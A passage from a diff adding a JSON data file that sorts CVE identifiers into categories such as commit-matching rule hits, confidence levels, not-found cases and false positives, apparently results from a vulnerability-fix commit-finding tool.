"CVE-2016-5431", + "CVE-2016-5697", + "CVE-2016-5841", + "CVE-2016-5842", + "CVE-2016-5851", + "CVE-2016-6298", + "CVE-2016-7528", + "CVE-2016-9298", + "CVE-2016-9909", + "CVE-2016-9910", + "CVE-2016-10149", + "CVE-2016-10345", + "CVE-2016-10522", + "CVE-2016-10524", + "CVE-2016-10531", + "CVE-2016-10536", + "CVE-2016-10540", + "CVE-2016-10544", + "CVE-2016-10554", + "CVE-2016-10556", + "CVE-2016-10577", + "CVE-2016-10703", + "CVE-2016-1000236", + "CVE-2016-1000338", + "CVE-2016-1000340", + "CVE-2016-1000343", + "CVE-2016-1000344", + "CVE-2017-0904", + "CVE-2017-2809", + "CVE-2017-3204", + "CVE-2017-5209", + "CVE-2017-5545", + "CVE-2017-5591", + "CVE-2017-5645", + "CVE-2017-5934", + "CVE-2017-5936", + "CVE-2017-5946", + "CVE-2017-7540", + "CVE-2017-7654", + "CVE-2017-7656", + "CVE-2017-8028", + "CVE-2017-8418", + "CVE-2017-8932", + "CVE-2017-11173", + "CVE-2017-12098", + "CVE-2017-12867", + "CVE-2017-12871", + "CVE-2017-13098", + "CVE-2017-14619", + "CVE-2017-14735", + "CVE-2017-15051", + "CVE-2017-15052", + "CVE-2017-15053", + "CVE-2017-15054", + "CVE-2017-15055", + "CVE-2017-15133", + "CVE-2017-15278", + "CVE-2017-15728", + "CVE-2017-15729", + "CVE-2017-15730", + "CVE-2017-15731", + "CVE-2017-15733", + "CVE-2017-15734", + "CVE-2017-15735", + "CVE-2017-15808", + "CVE-2017-15809", + "CVE-2017-15879", + "CVE-2017-15928", + "CVE-2017-16003", + "CVE-2017-16008", + "CVE-2017-16013", + "CVE-2017-16014", + "CVE-2017-16015", + "CVE-2017-16016", + "CVE-2017-16017", + "CVE-2017-16023", + "CVE-2017-16025", + "CVE-2017-16042", + "CVE-2017-16136", + "CVE-2017-16226", + "CVE-2017-16228", + "CVE-2017-16244", + "CVE-2017-16613", + "CVE-2017-16615", + "CVE-2017-16616", + "CVE-2017-16618", + "CVE-2017-16876", + "CVE-2017-16877", + "CVE-2017-16880", + "CVE-2017-17042", + "CVE-2017-18239", + "CVE-2017-18367", + "CVE-2017-1000188", + "CVE-2017-1000189", + "CVE-2017-1000228", + "CVE-2017-1000486", + "CVE-2017-1000487", + "CVE-2017-1000491", + "CVE-2017-1001002", + "CVE-2017-1001003", + "CVE-2017-1001004", + "CVE-2017-1002150", + "CVE-2018-1099", + "CVE-2018-1320", + "CVE-2018-3712", + "CVE-2018-3715", + "CVE-2018-3721", + "CVE-2018-3726", + "CVE-2018-3732", + "CVE-2018-3733", + "CVE-2018-3740", + "CVE-2018-3741", + "CVE-2018-3750", + "CVE-2018-3759", + "CVE-2018-3769", + "CVE-2018-3774", + "CVE-2018-3778", + "CVE-2018-3786", + "CVE-2018-5968", + "CVE-2018-6333", + "CVE-2018-7260", + "CVE-2018-7408", + "CVE-2018-7560", + "CVE-2018-7651", + "CVE-2018-7753", + "CVE-2018-8016", + "CVE-2018-9109", + "CVE-2018-9110", + "CVE-2018-9206", + "CVE-2018-10092", + "CVE-2018-10094", + "CVE-2018-10095", + "CVE-2018-10188", + "CVE-2018-10366", + "CVE-2018-10903", + "CVE-2018-10936", + "CVE-2018-11771", + "CVE-2018-11798", + "CVE-2018-12043", + "CVE-2018-12418", + "CVE-2018-12541", + "CVE-2018-12557", + "CVE-2018-12615", + "CVE-2018-12976", + "CVE-2018-13447", + "CVE-2018-13448", + "CVE-2018-13449", + "CVE-2018-13450", + "CVE-2018-13797", + "CVE-2018-13818", + "CVE-2018-14041", + "CVE-2018-14718", + "CVE-2018-14719", + "CVE-2018-14720", + "CVE-2018-14721", + "CVE-2018-14840", + "CVE-2018-15178", + "CVE-2018-15531", + "CVE-2018-16329", + "CVE-2018-16470", + "CVE-2018-16472", + "CVE-2018-16492", + "CVE-2018-17104", + "CVE-2018-17187", + "CVE-2018-17419", + "CVE-2018-18389", + "CVE-2018-18476", + "CVE-2018-19048", + "CVE-2018-19184", + "CVE-2018-19360", + "CVE-2018-19361", + "CVE-2018-19362", + "CVE-2018-19992", + "CVE-2018-19993", + "CVE-2018-19994", + "CVE-2018-20059", + "CVE-2018-20433", + "CVE-2018-20594", + "CVE-2018-20595", + "CVE-2018-20677", + "CVE-2018-20801", + "CVE-2018-20835", + "CVE-2018-20962", + "CVE-2018-1000089", + "CVE-2018-1000119", + "CVE-2018-1000129", + "CVE-2018-1000134", + "CVE-2018-1000164", + "CVE-2018-1000518", + "CVE-2018-1000525", + "CVE-2018-1000531", + "CVE-2018-1000538", + "CVE-2018-1000620", + "CVE-2018-1000632", + "CVE-2018-1000805", + "CVE-2018-1000807", + "CVE-2018-1000808", + "CVE-2018-1000814", + "CVE-2018-1000843", + "CVE-2018-1000850", + "CVE-2018-1000888", + "CVE-2018-1002201", + "CVE-2018-1002207", + "CVE-2018-1999024", + "CVE-2019-3564", + "CVE-2019-3826", + "CVE-2019-5413", + "CVE-2019-5484", + "CVE-2019-5884", + "CVE-2019-6798", + "CVE-2019-7164", + "CVE-2019-7548", + "CVE-2019-8457", + "CVE-2019-9658", + "CVE-2019-10131", + "CVE-2019-10157", + "CVE-2019-10217", + "CVE-2019-10241", + "CVE-2019-10682", + "CVE-2019-10749", + "CVE-2019-10751", + "CVE-2019-10752", + "CVE-2019-10762", + "CVE-2019-10767", + "CVE-2019-10776", + "CVE-2019-10781", + "CVE-2019-10787", + "CVE-2019-10792", + "CVE-2019-10793", + "CVE-2019-10795", + "CVE-2019-10799", + "CVE-2019-10867", + "CVE-2019-11272", + "CVE-2019-11358", + "CVE-2019-11514", + "CVE-2019-11768", + "CVE-2019-11777", + "CVE-2019-12277", + "CVE-2019-12402", + "CVE-2019-12616", + "CVE-2019-12741", + "CVE-2019-12814", + "CVE-2019-13127", + "CVE-2019-13135", + "CVE-2019-13173", + "CVE-2019-13295", + "CVE-2019-13574", + "CVE-2019-13644", + "CVE-2019-14540", + "CVE-2019-14668", + "CVE-2019-14669", + "CVE-2019-14671", + "CVE-2019-14672", + "CVE-2019-14751", + "CVE-2019-14806", + "CVE-2019-14837", + "CVE-2019-14862", + "CVE-2019-14863", + "CVE-2019-14893", + "CVE-2019-14980", + "CVE-2019-15481", + "CVE-2019-15532", + "CVE-2019-16317", + "CVE-2019-16318", + "CVE-2019-16335", + "CVE-2019-16676", + "CVE-2019-16761", + "CVE-2019-16762", + "CVE-2019-16763", + "CVE-2019-16766", + "CVE-2019-16769", + "CVE-2019-16771", + "CVE-2019-16778", + "CVE-2019-16779", + "CVE-2019-16784", + "CVE-2019-16785", + "CVE-2019-16786", + "CVE-2019-16789", + "CVE-2019-16792", + "CVE-2019-17267", + "CVE-2019-17496", + "CVE-2019-17513", + "CVE-2019-17531", + "CVE-2019-17541", + "CVE-2019-17592", + "CVE-2019-18622", + "CVE-2019-18656", + "CVE-2019-18848", + "CVE-2019-18857", + "CVE-2019-18874", + "CVE-2019-18978", + "CVE-2019-18981", + "CVE-2019-18982", + "CVE-2019-18985", + "CVE-2019-18986", + "CVE-2019-19010", + "CVE-2019-19275", + "CVE-2019-19507", + "CVE-2019-19576", + "CVE-2019-19619", + "CVE-2019-19687", + "CVE-2019-19703", + "CVE-2019-19794", + "CVE-2019-20330", + "CVE-2019-1000005", + "CVE-2019-1000021", + "CVE-2019-1020012", + "CVE-2020-1747", + "CVE-2020-5219", + "CVE-2020-5224", + "CVE-2020-5227", + "CVE-2020-5229", + "CVE-2020-5232", + "CVE-2020-5236", + "CVE-2020-5249", + "CVE-2020-5390", + "CVE-2020-5529", + "CVE-2020-6836", + "CVE-2020-7597", + "CVE-2020-7981", + "CVE-2020-8131", + "CVE-2020-9283", + "CVE-2020-10236", + "CVE-2020-10591", + "CVE-2020-10672", + "CVE-2020-10673" + ], + "VULN_ID_IN_MESSAGE": [ + "CVE-2013-0256", + "CVE-2013-2191", + "CVE-2014-0160", + "CVE-2014-0177", + "CVE-2014-1403", + "CVE-2014-8152", + "CVE-2015-0276", + "CVE-2015-0838", + "CVE-2015-1326", + "CVE-2015-1782", + "CVE-2015-7541", + "CVE-2015-8309", + "CVE-2016-3114", + "CVE-2016-4974", + "CVE-2016-5180", + "CVE-2016-6298", + "CVE-2016-10173", + "CVE-2017-5934", + "CVE-2017-11427", + "CVE-2017-11905", + "CVE-2017-11910", + "CVE-2017-15133", + "CVE-2017-16613", + "CVE-2017-16876", + "CVE-2018-8128", + "CVE-2018-8177", + "CVE-2018-8178", + "CVE-2018-8381", + "CVE-2018-8390", + "CVE-2018-10092", + "CVE-2018-10094", + "CVE-2018-10095", + "CVE-2018-10936", + "CVE-2018-11093", + "CVE-2018-12541", + "CVE-2018-12976", + "CVE-2018-16470", + "CVE-2018-19992", + "CVE-2018-19993", + "CVE-2018-19994", + "CVE-2018-20028", + "CVE-2018-20433", + "CVE-2019-0911", + "CVE-2019-0912", + "CVE-2019-0917", + "CVE-2019-0922", + "CVE-2019-0924", + "CVE-2019-0925", + "CVE-2019-0933", + "CVE-2019-1052", + "CVE-2019-1062", + "CVE-2019-1092", + "CVE-2019-1103", + "CVE-2019-1106", + "CVE-2019-1107", + "CVE-2019-1139", + "CVE-2019-1195", + "CVE-2019-1196", + "CVE-2019-1197", + "CVE-2019-10642", + "CVE-2019-10643", + "CVE-2019-11512", + "CVE-2019-14751", + "CVE-2019-16784", + "CVE-2019-18622", + "CVE-2019-18848", + "CVE-2020-5219", + "CVE-2020-5390", + "CVE-2020-9283" + ], + "VULN_ID_IN_LINKED_ISSUE": [ + "CVE-2014-3579", + "CVE-2014-3612", + "CVE-2016-4974", + "CVE-2016-6298", + "CVE-2016-10173", + "CVE-2017-5946", + "CVE-2017-8028", + "CVE-2018-1320", + "CVE-2019-3826", + "CVE-2019-14863", + "CVE-2020-1747", + "CVE-2020-8131" + ], + "XREF_BUG": [ + "CVE-2013-1879", + "CVE-2013-1880", + "CVE-2014-3579", + "CVE-2016-2166", + "CVE-2017-15703", + "CVE-2018-1309", + "CVE-2018-1320", + "CVE-2018-8013", + "CVE-2018-8016", + "CVE-2018-11771", + "CVE-2018-17187", + "CVE-2018-17193", + "CVE-2018-17194", + "CVE-2018-17195", + "CVE-2020-1928", + "CVE-2012-1176", + "CVE-2013-4116", + "CVE-2014-3120", + "CVE-2014-6394", + "CVE-2014-9721", + "CVE-2015-4082", + "CVE-2015-7294", + "CVE-2015-8854", + "CVE-2016-3720", + "CVE-2016-5007", + "CVE-2016-6298", + "CVE-2016-9909", + "CVE-2016-9910", + "CVE-2016-10149", + "CVE-2016-10173", + "CVE-2017-2809", + "CVE-2017-5545", + "CVE-2017-5946", + "CVE-2017-7540", + "CVE-2017-8028", + "CVE-2017-8418", + "CVE-2017-8932", + "CVE-2017-12098", + "CVE-2017-14735", + "CVE-2017-15133", + "CVE-2017-15703", + "CVE-2017-15879", + "CVE-2017-16013", + "CVE-2017-16023", + "CVE-2017-16025", + "CVE-2017-16042", + "CVE-2017-16615", + "CVE-2017-16616", + "CVE-2017-16618", + "CVE-2017-18239", + "CVE-2018-1098", + "CVE-2018-1099", + "CVE-2018-1309", + "CVE-2018-3740", + "CVE-2018-3769", + "CVE-2018-3778", + "CVE-2018-3786", + "CVE-2018-5968", + "CVE-2018-7408", + "CVE-2018-7651", + "CVE-2018-7753", + "CVE-2018-9206", + "CVE-2018-10903", + "CVE-2018-12418", + "CVE-2018-12541", + "CVE-2018-13797", + "CVE-2018-14718", + "CVE-2018-14719", + "CVE-2018-14720", + "CVE-2018-14721", + "CVE-2018-14840", + "CVE-2018-15178", + "CVE-2018-17104", + "CVE-2018-17193", + "CVE-2018-17194", + "CVE-2018-17195", + "CVE-2018-17419", + "CVE-2018-18476", + "CVE-2018-19360", + "CVE-2018-19361", + "CVE-2018-19362", + "CVE-2018-20059", + "CVE-2018-20594", + "CVE-2018-20595", + "CVE-2018-20677", + "CVE-2018-20962", + "CVE-2018-1000164", + "CVE-2018-1000525", + "CVE-2018-1000531", + "CVE-2018-1000538", + "CVE-2018-1000620", + "CVE-2018-1000632", + "CVE-2018-1000805", + "CVE-2018-1000807", + "CVE-2018-1000808", + "CVE-2018-1000814", + "CVE-2018-1000843", + "CVE-2018-1002207", + "CVE-2018-1002208", + "CVE-2019-3826", + "CVE-2019-7164", + "CVE-2019-7548", + "CVE-2019-7722", + "CVE-2019-9658", + "CVE-2019-10217", + "CVE-2019-10248", + "CVE-2019-11358", + "CVE-2019-11777", + "CVE-2019-12814", + "CVE-2019-13644", + "CVE-2019-14540", + "CVE-2019-14668", + "CVE-2019-14669", + "CVE-2019-14671", + "CVE-2019-14672", + "CVE-2019-14862", + "CVE-2019-14863", + "CVE-2019-14893", + "CVE-2019-15481", + "CVE-2019-15532", + "CVE-2019-15658", + "CVE-2019-16335", + "CVE-2019-17267", + "CVE-2019-17531", + "CVE-2019-18874", + "CVE-2019-19507", + "CVE-2019-19703", + "CVE-2019-19794", + "CVE-2019-20330", + "CVE-2019-1000005", + "CVE-2020-1747", + "CVE-2020-1928", + "CVE-2020-8131", + "CVE-2020-10672", + "CVE-2020-10673" + ], + "COMMIT_IS_SECURITY_RELEVANT": [ + "CVE-2010-5312", + "CVE-2011-1950", + "CVE-2011-2765", + "CVE-2011-3186", + "CVE-2011-3923", + "CVE-2011-4030", + "CVE-2011-4461", + "CVE-2012-1176", + "CVE-2012-2378", + "CVE-2012-2417", + "CVE-2012-3366", + "CVE-2012-3408", + "CVE-2012-3458", + "CVE-2012-3536", + "CVE-2012-5812", + "CVE-2012-6550", + "CVE-2013-0256", + "CVE-2013-0294", + "CVE-2013-1607", + "CVE-2013-1800", + "CVE-2013-1801", + "CVE-2013-1879", + "CVE-2013-1880", + "CVE-2013-2013", + "CVE-2013-2172", + "CVE-2013-2191", + "CVE-2013-3300", + "CVE-2013-4111", + "CVE-2013-4116", + "CVE-2013-4316", + "CVE-2013-4413", + "CVE-2013-4562", + "CVE-2013-4701", + "CVE-2013-6465", + "CVE-2013-7378", + "CVE-2013-7459", + "CVE-2014-0072", + "CVE-2014-0073", + "CVE-2014-0120", + "CVE-2014-0121", + "CVE-2014-0160", + "CVE-2014-0177", + "CVE-2014-1403", + "CVE-2014-1604", + "CVE-2014-1904", + "CVE-2014-2525", + "CVE-2014-3120", + "CVE-2014-3250", + "CVE-2014-3488", + "CVE-2014-3576", + "CVE-2014-3577", + "CVE-2014-3579", + "CVE-2014-3612", + "CVE-2014-3741", + "CVE-2014-3995", + "CVE-2014-4657", + "CVE-2014-6394", + "CVE-2014-7192", + "CVE-2014-7193", + "CVE-2014-7809", + "CVE-2014-8152", + "CVE-2014-8681", + "CVE-2014-8682", + "CVE-2014-9130", + "CVE-2014-9489", + "CVE-2014-9682", + "CVE-2014-9721", + "CVE-2014-9970", + "CVE-2015-0276", + "CVE-2015-0838", + "CVE-2015-0846", + "CVE-2015-1326", + "CVE-2015-1772", + "CVE-2015-1782", + "CVE-2015-3206", + "CVE-2015-3220", + "CVE-2015-4082", + "CVE-2015-4412", + "CVE-2015-4619", + "CVE-2015-5081", + "CVE-2015-6524", + "CVE-2015-6584", + "CVE-2015-7294", + "CVE-2015-7541", + "CVE-2015-7809", + "CVE-2015-8309", + "CVE-2015-8310", + "CVE-2015-8747", + "CVE-2015-8814", + "CVE-2015-8854", + "CVE-2015-8862", + "CVE-2015-9235", + "CVE-2016-1505", + "CVE-2016-2166", + "CVE-2016-2537", + "CVE-2016-3114", + "CVE-2016-3693", + "CVE-2016-3720", + "CVE-2016-4000", + "CVE-2016-4562", + "CVE-2016-4563", + "CVE-2016-4564", + "CVE-2016-4974", + "CVE-2016-4977", + "CVE-2016-5104", + "CVE-2016-5180", + "CVE-2016-5431", + "CVE-2016-5697", + "CVE-2016-5841", + "CVE-2016-5842", + "CVE-2016-5851", + "CVE-2016-6298", + "CVE-2016-7528", + "CVE-2016-8738", + "CVE-2016-9909", + "CVE-2016-9910", + "CVE-2016-10149", + "CVE-2016-10173", + "CVE-2016-10345", + "CVE-2016-10522", + "CVE-2016-10524", + "CVE-2016-10528", + "CVE-2016-10529", + "CVE-2016-10531", + "CVE-2016-10536", + "CVE-2016-10540", + "CVE-2016-10544", + "CVE-2016-10554", + "CVE-2016-10556", + "CVE-2016-10558", + "CVE-2016-10559", + "CVE-2016-10560", + "CVE-2016-10575", + "CVE-2016-10577", + "CVE-2016-10591", + "CVE-2016-10611", + "CVE-2016-10694", + "CVE-2016-10703", + "CVE-2016-10735", + "CVE-2016-1000338", + "CVE-2016-1000340", + "CVE-2016-1000343", + "CVE-2016-1000344", + "CVE-2017-0904", + "CVE-2017-2617", + "CVE-2017-2652", + "CVE-2017-2667", + "CVE-2017-2809", + "CVE-2017-3204", + "CVE-2017-4973", + "CVE-2017-5209", + "CVE-2017-5545", + "CVE-2017-5591", + "CVE-2017-5641", + "CVE-2017-5645", + "CVE-2017-5858", + "CVE-2017-5934", + "CVE-2017-5936", + "CVE-2017-5946", + "CVE-2017-7540", + "CVE-2017-7654", + "CVE-2017-7656", + "CVE-2017-7674", + "CVE-2017-8028", + "CVE-2017-8418", + "CVE-2017-8932", + "CVE-2017-9796", + "CVE-2017-11173", + "CVE-2017-11427", + "CVE-2017-11467", + "CVE-2017-11905", + "CVE-2017-11910", + "CVE-2017-12098", + "CVE-2017-12616", + "CVE-2017-12620", + "CVE-2017-12867", + "CVE-2017-12871", + "CVE-2017-13098", + "CVE-2017-14619", + "CVE-2017-14735", + "CVE-2017-15051", + "CVE-2017-15054", + "CVE-2017-15055", + "CVE-2017-15133", + "CVE-2017-15278", + "CVE-2017-15728", + "CVE-2017-15729", + "CVE-2017-15730", + "CVE-2017-15731", + "CVE-2017-15733", + "CVE-2017-15734", + "CVE-2017-15735", + "CVE-2017-15808", + "CVE-2017-15809", + "CVE-2017-15928", + "CVE-2017-16003", + "CVE-2017-16007", + "CVE-2017-16008", + "CVE-2017-16013", + "CVE-2017-16014", + "CVE-2017-16015", + "CVE-2017-16016", + "CVE-2017-16017", + "CVE-2017-16025", + "CVE-2017-16042", + "CVE-2017-16226", + "CVE-2017-16228", + "CVE-2017-16244", + "CVE-2017-16613", + "CVE-2017-16615", + "CVE-2017-16616", + "CVE-2017-16618", + "CVE-2017-16876", + "CVE-2017-16880", + "CVE-2017-17042", + "CVE-2017-18239", + "CVE-2017-18367", + "CVE-2017-1000188", + "CVE-2017-1000189", + "CVE-2017-1000228", + "CVE-2017-1000389", + "CVE-2017-1000486", + "CVE-2017-1000487", + "CVE-2017-1000491", + "CVE-2017-1001002", + "CVE-2017-1001003", + "CVE-2017-1001004", + "CVE-2017-1002150", + "CVE-2018-1098", + "CVE-2018-1099", + "CVE-2018-1260", + "CVE-2018-1261", + "CVE-2018-1263", + "CVE-2018-1309", + "CVE-2018-1320", + "CVE-2018-3712", + "CVE-2018-3714", + "CVE-2018-3721", + "CVE-2018-3726", + "CVE-2018-3731", + "CVE-2018-3733", + "CVE-2018-3740", + "CVE-2018-3741", + "CVE-2018-3750", + "CVE-2018-3759", + "CVE-2018-3769", + "CVE-2018-3774", + "CVE-2018-3778", + "CVE-2018-3786", + "CVE-2018-5968", + "CVE-2018-6333", + "CVE-2018-7260", + "CVE-2018-7560", + "CVE-2018-7651", + "CVE-2018-7753", + "CVE-2018-8013", + "CVE-2018-8128", + "CVE-2018-8177", + "CVE-2018-8178", + "CVE-2018-8381", + "CVE-2018-8390", + "CVE-2018-9109", + "CVE-2018-9110", + "CVE-2018-9206", + "CVE-2018-10092", + "CVE-2018-10094", + "CVE-2018-10095", + "CVE-2018-10188", + "CVE-2018-10903", + "CVE-2018-11093", + "CVE-2018-11771", + "CVE-2018-11798", + "CVE-2018-12043", + "CVE-2018-12418", + "CVE-2018-12541", + "CVE-2018-12557", + "CVE-2018-12615", + "CVE-2018-12976", + "CVE-2018-13447", + "CVE-2018-13448", + "CVE-2018-13449", + "CVE-2018-13450", + "CVE-2018-13797", + "CVE-2018-14041", + "CVE-2018-14637", + "CVE-2018-14718", + "CVE-2018-14719", + "CVE-2018-14720", + "CVE-2018-14721", + "CVE-2018-14840", + "CVE-2018-15178", + "CVE-2018-15531", + "CVE-2018-16329", + "CVE-2018-16459", + "CVE-2018-16462", + "CVE-2018-16470", + "CVE-2018-16472", + "CVE-2018-16490", + "CVE-2018-16492", + "CVE-2018-17104", + "CVE-2018-17187", + "CVE-2018-17193", + "CVE-2018-17194", + "CVE-2018-17195", + "CVE-2018-17197", + "CVE-2018-18389", + "CVE-2018-18476", + "CVE-2018-19360", + "CVE-2018-19361", + "CVE-2018-19362", + "CVE-2018-19992", + "CVE-2018-19993", + "CVE-2018-19994", + "CVE-2018-20028", + "CVE-2018-20059", + "CVE-2018-20433", + "CVE-2018-20594", + "CVE-2018-20595", + "CVE-2018-20677", + "CVE-2018-20835", + "CVE-2018-20962", + "CVE-2018-1000013", + "CVE-2018-1000014", + "CVE-2018-1000089", + "CVE-2018-1000119", + "CVE-2018-1000129", + "CVE-2018-1000134", + "CVE-2018-1000164", + "CVE-2018-1000518", + "CVE-2018-1000531", + "CVE-2018-1000538", + "CVE-2018-1000620", + "CVE-2018-1000632", + "CVE-2018-1000805", + "CVE-2018-1000807", + "CVE-2018-1000808", + "CVE-2018-1000814", + "CVE-2018-1000843", + "CVE-2018-1000850", + "CVE-2018-1000888", + "CVE-2018-1002201", + "CVE-2018-1002207", + "CVE-2018-1002208", + "CVE-2019-0911", + "CVE-2019-0912", + "CVE-2019-0917", + "CVE-2019-0922", + "CVE-2019-0924", + "CVE-2019-0925", + "CVE-2019-0933", + "CVE-2019-1052", + "CVE-2019-1062", + "CVE-2019-1092", + "CVE-2019-1103", + "CVE-2019-1106", + "CVE-2019-1107", + "CVE-2019-1139", + "CVE-2019-1195", + "CVE-2019-1197", + "CVE-2019-3564", + "CVE-2019-5413", + "CVE-2019-5484", + "CVE-2019-5884", + "CVE-2019-6798", + "CVE-2019-7617", + "CVE-2019-7722", + "CVE-2019-8331", + "CVE-2019-9212", + "CVE-2019-9658", + "CVE-2019-9844", + "CVE-2019-10131", + "CVE-2019-10217", + "CVE-2019-10240", + "CVE-2019-10248", + "CVE-2019-10642", + "CVE-2019-10643", + "CVE-2019-10745", + "CVE-2019-10748", + "CVE-2019-10750", + "CVE-2019-10760", + "CVE-2019-10762", + "CVE-2019-10764", + "CVE-2019-10767", + "CVE-2019-10776", + "CVE-2019-10778", + "CVE-2019-10780", + "CVE-2019-10787", + "CVE-2019-10792", + "CVE-2019-10793", + "CVE-2019-10795", + "CVE-2019-10797", + "CVE-2019-10799", + "CVE-2019-10904", + "CVE-2019-11272", + "CVE-2019-11358", + "CVE-2019-11512", + "CVE-2019-11514", + "CVE-2019-11767", + "CVE-2019-11768", + "CVE-2019-11777", + "CVE-2019-12277", + "CVE-2019-12404", + "CVE-2019-12407", + "CVE-2019-12616", + "CVE-2019-12741", + "CVE-2019-12814", + "CVE-2019-13127", + "CVE-2019-13135", + "CVE-2019-13173", + "CVE-2019-13209", + "CVE-2019-13295", + "CVE-2019-13574", + "CVE-2019-13644", + "CVE-2019-14540", + "CVE-2019-14668", + "CVE-2019-14669", + "CVE-2019-14671", + "CVE-2019-14672", + "CVE-2019-14751", + "CVE-2019-14863", + "CVE-2019-14893", + "CVE-2019-14980", + "CVE-2019-15481", + "CVE-2019-15532", + "CVE-2019-15657", + "CVE-2019-15658", + "CVE-2019-16197", + "CVE-2019-16317", + "CVE-2019-16318", + "CVE-2019-16335", + "CVE-2019-16676", + "CVE-2019-16763", + "CVE-2019-16766", + "CVE-2019-16769", + "CVE-2019-16771", + "CVE-2019-16778", + "CVE-2019-16779", + "CVE-2019-16784", + "CVE-2019-16785", + "CVE-2019-16786", + "CVE-2019-16789", + "CVE-2019-16792", + "CVE-2019-17267", + "CVE-2019-17513", + "CVE-2019-17531", + "CVE-2019-17541", + "CVE-2019-17592", + "CVE-2019-18622", + "CVE-2019-18656", + "CVE-2019-18848", + "CVE-2019-18857", + "CVE-2019-18874", + "CVE-2019-18889", + "CVE-2019-18978", + "CVE-2019-18982", + "CVE-2019-18985", + "CVE-2019-18986", + "CVE-2019-19010", + "CVE-2019-19212", + "CVE-2019-19275", + "CVE-2019-19576", + "CVE-2019-19619", + "CVE-2019-19687", + "CVE-2019-19703", + "CVE-2019-19794", + "CVE-2019-20330", + "CVE-2019-1000005", + "CVE-2019-1000021", + "CVE-2019-1010266", + "CVE-2019-1020012", + "CVE-2020-1747", + "CVE-2020-1928", + "CVE-2020-5224", + "CVE-2020-5227", + "CVE-2020-5229", + "CVE-2020-5236", + "CVE-2020-5249", + "CVE-2020-5390", + "CVE-2020-5529", + "CVE-2020-7597", + "CVE-2020-7981", + "CVE-2020-8125", + "CVE-2020-8131", + "CVE-2020-9283", + "CVE-2020-10236", + "CVE-2020-10591", + "CVE-2020-10672", + "CVE-2020-10673" + ], + "medium": [ + "CVE-2013-3567", + "CVE-2013-4002", + "CVE-2014-5277", + "CVE-2014-7189", + "CVE-2016-10100", + "CVE-2016-10574", + "CVE-2017-2638", + "CVE-2017-12622", + "CVE-2017-1000451", + "CVE-2018-3738", + "CVE-2018-6591", + "CVE-2019-0207", + "CVE-2019-3772", + "CVE-2019-10089", + "CVE-2019-10090", + "CVE-2019-10756", + "CVE-2019-10757", + "CVE-2020-9281" + ], + "low": [ + "CVE-2016-4438", + "CVE-2016-10543", + "CVE-2016-10564", + "CVE-2016-10569", + "CVE-2017-7688", + "CVE-2019-10077" + ], + "not_found": [ + "CVE-2012-0881", + "CVE-2014-7143", + "CVE-2015-0250", + "CVE-2015-3627", + "CVE-2016-9962", + "CVE-2018-1196", + "CVE-2018-7576", + "CVE-2018-8031", + "CVE-2019-0219", + "CVE-2019-3792", + "CVE-2019-14537" + ], + "not_reported": [ + "CVE-2010-2245", + "CVE-2011-2730", + "CVE-2013-0248", + "CVE-2013-4204", + "CVE-2013-4286", + "CVE-2013-4322", + "CVE-2013-6235", + "CVE-2014-0050", + "CVE-2016-8739", + "CVE-2016-10532", + "CVE-2016-10562", + "CVE-2016-10566", + "CVE-2016-10567", + "CVE-2016-10568", + "CVE-2016-10570", + "CVE-2016-10571", + "CVE-2016-10572", + "CVE-2016-10573", + "CVE-2016-10576", + "CVE-2016-10586", + "CVE-2016-10587", + "CVE-2016-10588", + "CVE-2016-10626", + "CVE-2017-4971", + "CVE-2017-5638", + "CVE-2017-8046", + "CVE-2017-16029", + "CVE-2017-16083", + "CVE-2017-16084", + "CVE-2017-16107", + "CVE-2017-1000431", + "CVE-2018-3757", + "CVE-2018-6341", + "CVE-2018-6873", + "CVE-2018-8026", + "CVE-2018-14732", + "CVE-2018-16485", + "CVE-2018-17184", + "CVE-2018-20094", + "CVE-2019-5444", + "CVE-2019-5479", + "CVE-2019-10771", + "CVE-2019-10777", + "CVE-2019-12405" + ], + "false_positive": [ + "CVE-2010-0156", + "CVE-2010-0684", + "CVE-2010-2076", + "CVE-2010-4534", + "CVE-2010-4535", + "CVE-2010-5142", + "CVE-2011-1772", + "CVE-2011-2732", + "CVE-2011-2929", + "CVE-2011-2930", + "CVE-2011-2931", + "CVE-2011-2932", + "CVE-2011-3848", + "CVE-2011-3869", + "CVE-2011-3870", + "CVE-2011-3871", + "CVE-2011-3872", + "CVE-2011-4104", + "CVE-2011-4838", + "CVE-2011-5036", + "CVE-2011-5097", + "CVE-2011-5098", + "CVE-2012-0392", + "CVE-2012-0394", + "CVE-2012-1054", + "CVE-2012-1098", + "CVE-2012-1099", + "CVE-2012-1906", + "CVE-2012-1986", + "CVE-2012-1987", + "CVE-2012-2098", + "CVE-2012-2139", + "CVE-2012-2379", + "CVE-2012-2660", + "CVE-2012-2661", + "CVE-2012-3451", + "CVE-2012-3865", + "CVE-2012-3867", + "CVE-2012-4386", + "CVE-2012-4387", + "CVE-2012-4449", + "CVE-2012-4520", + "CVE-2012-5055", + "CVE-2012-5633", + "CVE-2012-6662", + "CVE-2012-6684", + "CVE-2012-6685", + "CVE-2012-6708", + "CVE-2013-0262", + "CVE-2013-0263", + "CVE-2013-0285", + "CVE-2013-1654", + "CVE-2013-1812", + "CVE-2013-2115", + "CVE-2013-2132", + "CVE-2013-2134", + "CVE-2013-2135", + "CVE-2013-2254", + "CVE-2013-2275", + "CVE-2013-4152", + "CVE-2013-4249", + "CVE-2013-4251", + "CVE-2013-4353", + "CVE-2013-4428", + "CVE-2013-4477", + "CVE-2013-4761", + "CVE-2013-5093", + "CVE-2013-5123", + "CVE-2013-6044", + "CVE-2013-6348", + "CVE-2013-6429", + "CVE-2013-6430", + "CVE-2013-7315", + "CVE-2013-7370", + "CVE-2013-7397", + "CVE-2013-7398", + "CVE-2014-0012", + "CVE-2014-0014", + "CVE-2014-0035", + "CVE-2014-0075", + "CVE-2014-0086", + "CVE-2014-0097", + "CVE-2014-0107", + "CVE-2014-0109", + "CVE-2014-0110", + "CVE-2014-0116", + "CVE-2014-0193", + "CVE-2014-0224", + "CVE-2014-0225", + "CVE-2014-0228", + "CVE-2014-1402", + "CVE-2014-1829", + "CVE-2014-1830", + "CVE-2014-1832", + "CVE-2014-1858", + "CVE-2014-1859", + "CVE-2014-1869", + "CVE-2014-1932", + "CVE-2014-1933", + "CVE-2014-2053", + "CVE-2014-2235", + "CVE-2014-2538", + "CVE-2014-3007", + "CVE-2014-3505", + "CVE-2014-3506", + "CVE-2014-3509", + "CVE-2014-3511", + "CVE-2014-3572", + "CVE-2014-3578", + "CVE-2014-3600", + "CVE-2014-3625", + "CVE-2014-3630", + "CVE-2014-3709", + "CVE-2014-3994", + "CVE-2014-4172", + "CVE-2014-4658", + "CVE-2014-4678", + "CVE-2014-7202", + "CVE-2014-7203", + "CVE-2014-7205", + 